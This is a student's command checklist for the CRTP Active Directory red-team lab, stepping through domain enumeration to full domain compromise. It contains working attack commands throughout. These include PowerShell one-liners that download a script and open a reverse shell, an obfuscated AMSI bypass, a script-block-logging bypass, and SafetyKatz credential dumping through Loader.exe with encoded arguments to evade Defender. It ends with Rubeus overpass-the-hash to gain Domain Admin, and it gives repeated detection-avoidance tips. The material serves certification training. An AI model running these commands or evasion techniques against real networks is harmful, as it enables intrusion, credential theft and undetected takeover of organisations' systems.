CRTP Command Checklists:

Objective1: Enumerate following for the dollarcorp domain:

-Users
-Computers
-Domain Administrators
-Enterprise Administrators
____________________
| *~> represents commands to run |

#starts powershell session to avoid enhanced logging

~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

#load powerview into the powershell session

~> . C:\AD\Tools\PowerView.ps1

#enumerate the following

~> Get-DomainUser (1)
~> Get-DomainUser | select -ExpandProperty samaccountname (2)
~> Get-DomainComputer | select -ExpandProperty dnshostname (3)
~> Get-DomainGroup -Identity "Domain Admins" (4)
~> Get-DomainGroupMember -Identity "Domain Admins" (5)
~> Get-DomainGroupMember -Identity "Enterprise Admins" (6)
~> Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local (7)

(1) To list a specific property of all the users, we can use the select-object (or
its alias select) cmdlet. For example, to list only the samaccountname run the
following command

(2) Now, to enumerate member computers in the domain we can use Get-DomainComputer:
(3) To list a specific property of all the users, we can use the select-object (or
its alias select) cmdlet. For example, to list only the samaccountname run the
following command:
(4) To see details of the Domain Admins group:
(5) To enumerate members of the Domain Admins group:
(6) Get-DomainGroupMember -Identity "Enterprise Admins"
(7) Since, this is not a root domain, the above command will return nothing. We
need to query the root domain as Enterprise Admins group is present only in the
root of a forest.
___________________________________________________________________________________

Objective2: Enumerate following for the dollarcorp domain:

List all the OUs

List all the computers in the StudentMachines OU.
List the GPOs
Enumerate GPO applied on the StudentMachines OU.
______________________________

~> Get-DomainOU (1)

~> Get-DomainOU | select -ExpandProperty name (2)
~> (Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-
DomainComputer -SearchBase $_} | select name (3)
~> Get-DomainGPO (4)
~> (Get-DomainOU -Identity StudentMachines).gplink (5)
~> Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}' (6)
~> Get-DomainGPO -Identity (Get-DomainOU -Identity
StudentMachines).gplink.substring(11,(Get-DomainOU -Identity
StudentMachines).gplink.length-72) (7)

(1) To list all the OUs, run the below command after bypassing AMSI and loading
PowerView
(2) To see just the names of the OUs:
(3) Now, to list all the computers in the StudentsMachines OU:
(4) Command to list the GPOs. Note the name (not displayname) of group policies may
be different in your lab instance
(5) Enumerate GPO applied on the StudentMachines OU, we need to copy a part of the
gplink attribute from the output of the below command
(6) Now, copy the highlighted string from above (no square brackets, no semicolon
and nothing after semicolon) and use the it
(7) It is possible to hack both the commands together in a single command
(profiting from the static length for GUIDs):

___________________________________________________________________________________

Objective3: Enumerate following for the dollarcorp domain

-ACL for the Domain Admins group

-All modify rights/permissions for the student
________

~> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose (1)

~> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match
"student29"} (2) (*) yields no results
~> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match
"RDPUsers"} (3)

(1) Let's enumerate ACLs for the Domain Admins Group:

(2) Finally, to check for modify rights/permissions for the studentx, we can use
FindInterestingDomainACL from PowerView:
(3) Since studentx is a member of the RDPUsers group, let us check permissions for
it too
___________________________________________________________________________________

Objective4:

-Enumerate all domains in the moneycorp.local forest.

-Map the trusts of the dollarcorp.moneycorp.local domain.
-Map External trusts in moneycorp.local forest.
-Identify external trusts of dollarcorp domain. Can you enumerate trusts for a -
trusting forest?
________________

~> Get-ForestDomain -Verbose (1)

~> Get-DomainTrust (2)
~> Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq
"FILTER_SIDS"} (3)
~> Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"} (4)
~> Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name} (5)

(1) Enumerate all domains in the current forest:

(2) To map all the trusts of the dollarcorp domain:
(3) To list only the external trusts in the moneycorp.local forest
(4) To identify external trusts of the dollarcorp domain
(5) Since the above is a Bi-Directional trust, we can extract information from the
eurocorp.local forest. We either need bi-directional trust or one-way trust from
eurocorp.local to dollarcorp to be able to use the below command. Let's go for the
last task and enumerate trusts for eurocorp.local forest
___________________________________________________________________________________

Objective5:
-Exploit a service on dcorp-studentx and elevate privileges to local administrator.
-Identify a machine in the domain where studentx has local administrative access.
-Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on
172.16.3.11 - the dcorp-ci server.
_____________________________
*first run these

~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~> . C:\AD\Tools\PowerUp.ps1
~> Invoke-AllChecks

~> Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose

(1) (log off and in for admin privs)
~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess (2)
~> winrs -r:dcorp-adminsrv cmd (3)
~> set username (3)
~> set computername (3)

(1) Let's use the abuse function for Invoke-ServiceAbuse and add our current domain
user to the local Administrators group.
(2) Now for the next task, to identify a machine in the domain where studentx has
local administrative access use Find-PSRemotingLocalAdminAccess.ps1
(3) So, studentx has administrative access on dcorp-adminsrv and on the student
machine. We can connect to dcorp-adminsrv using winrs as the student user

- powershell.exe -c iex ((New-Object

Net.WebClient).DownloadString('http://172.16.100.X/Invoke-
PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.729 -Port 443 (or)
- powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -
UseBasicParsing);Power -Reverse -IPAddress 172.16.100.29 -Port 443

# The scripts above are what we use to leverage a reverse shell (in this case we
are abusing misconfiguredJenkins instance)

____________________________________________________________________________

Objective6:
 -Setup BloodHound and identify shortest path to Domain Admins in the dollarcorp
domain

________________

*Bloodhound uses neo4j; exit BH once you have stopped using it as it uses good
amount of RAM. You may also like to stop the neo4j service if you are not using
BloodHound

_________________________________________________________________________________

Objective 7:

-Identify a machine in the target domain where a Domain Admin(DA) session is

available.
-Compromise the machine and escalate privileges to Domain Admin
-Using access to dcorp-ci
-Using derivative local admin

~> iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing) (1)

~> S`eT-It`em ( 'V'+'aR' + 'IA' + (('b'+("{1}{0}"-f':1','lE'))+'q2') + ('uZ'+'x')
) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')
+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f(('U'+'ti')
+'l'),'A',('Am'+'si'),(('.'+'Man')+('ag'+'e')+('me'+'n')+'t.'),('u'+'to'+(("{1}
{0}"-f 'io','mat')+'n.')),'s',(('Sys'+'t')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}"
-f('a'+('ms'+'i')),'d',('I'+('n'+'itF')+('a'+'ile')) ),( "{2}{4}{0}{1}{3}" -f
('S'+('t'+'at')),'i',(('N'+'on')+('Pu'+'bl')+'i'),'c','c,' ))."sE`T`VaLUE"( $
{n`ULl},${t`RuE} ) (2)
~> iex ((New-Object
Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1')) (3)
~> Find-DomainUserLocation (4)
~> winrs -r:<UserDomain> set computername;set username(5)
~> winrs -r:<UserDomain> set username (6)

(1) Script block logging bypass (script is sbloggingbypass)

(2) AMSI bypass
(3) Downloading PowerView scripts
(4) We are checking if there are any Domain Admin sessions available(will only work
with PowerView installed) (ASMI bypass required)
(5) Here we want to use winrs
(6) Note that we are not running commands like "whoami" so that are able to avoid
detection

# *Note that we are using the first two commands to avoid detection, the commands
(1) & (2) allow us to run scripts like PowerView to locate useful information; in
this case we are using Powerview to check for DA sessions in the target domain
# *Avoiding detection is the purpose that InviShell served up until now

# *We would now run SafetyKatz.exe on dcorp-mgmt to extract credentials from it.
For that, we need to copy Loader.exe on dcorp-mgmt. Let's download Loader.exe on
dcorp-ci and copy it from there to dcorp-mgmt. This is to avoid any downloading
activity on dcorp-mgmt.
~> iwr http://<OurIP>/Loader.exe -OutFile C:\Users\Public\Loader.exe (1)
~> echo F | xcopy C:\Users\Public\Loader.exe \\<UserDomain>\C$\Users\Public\
Loader.exe

(1) Run on reverse shell

(2) Now, copy the Loader.exe to dcorp-mgmt: (target_UserDomain)

# *dcorpci (UserDomain) > req sent to DC to retrieve all computer names and
memberships of the DA group > The request is sent out to every machine in the
domain

# *Never save or run anything from any of the temp directories as that is very
"loud"
# *Note that Windows Defender on dcorp-mgmt (UserDomain) would detect SafetKatz
execution even when used with Loader. To avoid that, let's pass encoded arguments
to the Loader

~> ArgSplit.bat (1)

(1) Pass encoded arguments to the Loader

output:

```
# [!] Argument Limit: 180 characters
[+] Enter a string: sekurlsa::ekeys
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
```

# The following steps are used to create port forwarding

~> $null | winrs -r:<UserDomain> "netsh interface portproxy add v4tov4
listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<OurIP> (1)
~> $null | winrs -r:<UserDomain> C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe sekurlsa:: ekeys exit (2)

(1) Port forwarding command

(2) LoopBack for port forwarding

~> iwr http://<OurIP>/Safety.bat -OutFile C:\Users\Public\Safety.bat (1)

~> echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\
Safety.bat (2)
~> $null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat" (3)

(1) Download the batch file on dcorp-ci. Run the below commands on the reverse
shell
(2) Now, copy the Safety.bat to dcorp-mgmt: (target_UserDomain)
(3) Run Safety.bat on dcorp-mgmt (target_UserDomain) that use Loader.exe to
download and execute SafetyKatz.exe in-memory on dcorp-mgmt:

#SWEET!! We Found Domain Admin creds thanks to the output "aes256_hmac" which
should appear to be an alpha-numeric code

#Next We will be using the Overpass the hash to start a session on the domain
controller using the Domain Admins creds we just found.

~> Rubeus.exe asktgt /user:svcadmin(DomainAdmin) /aes256: <alpha-numeric code>

/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

~> wins -r:<DomainController> cmd (1)

~> set username (2)
~> logoff (3)

(1) interacting with DC using new creds(elevated privileges)

(2) Checking our current user has the elevated privs
(3) Log out and log back in to use the NEW DA privs

# *Now that we have Domain Administrator privileges on the Domain Controller we

have FULL control over ALL the machines/objects in the domain

# We can access whatever machine we want in the ENTIRE domain/forest/enterprise

!!!!!FULL DOMAIN DOMINATION!!!!!!!!!!!